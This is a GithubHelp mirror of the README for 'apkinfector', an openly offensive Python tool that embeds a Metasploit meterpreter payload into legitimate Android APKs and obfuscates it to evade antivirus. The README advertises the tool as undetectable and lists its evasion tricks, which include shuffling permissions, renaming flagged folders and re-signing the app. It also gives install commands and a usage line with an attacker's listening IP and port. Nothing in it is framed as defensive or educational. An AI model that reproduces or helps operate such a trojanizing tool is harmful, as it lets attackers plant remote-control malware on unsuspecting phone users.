GithubHelp home page GithubHelp logo

bazickoff / apkinfector Goto Github PK

View Code? Open in Web Editor NEW

This project forked from pushpenderindia/apkinfector

0.0 0.0 0.0 285 KB

Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK

Python 100.00%

apkinfector's Introduction

APK Infector Logo

APK Infector

                    This small python script can do really awesome work.

Advanced Android Antivirus Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK & can completely ofusticate the meterpreter payload with different techniques.

Features

  • Fully Automate Payload Creation Using MSFvenom
  • Creates a handler.rc File
  • Undetectable
  • Ofusticate Meterpreter APK
  • Binds/Embeds Meterpreter APK with Any Legitimate APK
  • Automatically Generates a Key which is used in signing
  • Capable to Sign APK Using Jarsigner or APKsigner
  • Zipalign the Signed APK
  • Shuffles the Permissions of Meterpreter APK for AV Evasion
  • Changes the default foldername and filenames which are being flagged by AV

Tools Overview

Front View Sample Feature
Index f

Prerequisite

  • Python 3.X
  • APKsigner or Jarsigner [One of them]
  • APK Tool [Latest]
  • ZipAlign

Tested On

Kali) Kali Linux - 2019.4

Installation & Usage


# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/apkinfector.git

# Navigate to technowlogger folder
$ cd apkinfector

# Installing dependencies
$ apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner

# Running the Tool for 1st Time
$ python3 infector.py --help

# Usage Example
$ python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk

Available Arguments

  • Optional Arguments
Short Hand Full Hand Description
-h --help show this help message and exit
  • Required Arguments
Short Hand Full Hand Description
--lhost 192.168.44.33 Attacker's IP Address
--lport 4444 Attacker's Port
-n NORMAL_APK --normal-apk NORMAL_APK Absolute Path of Legitimate APK File
--apk-name APKNAME APK Name (Anything You Want To Name)

Contribute

  • All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.

Contact

[email protected]

Believes In Donation

More Features Coming Soon...

apkinfector's People

Contributors

pushpenderindia avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.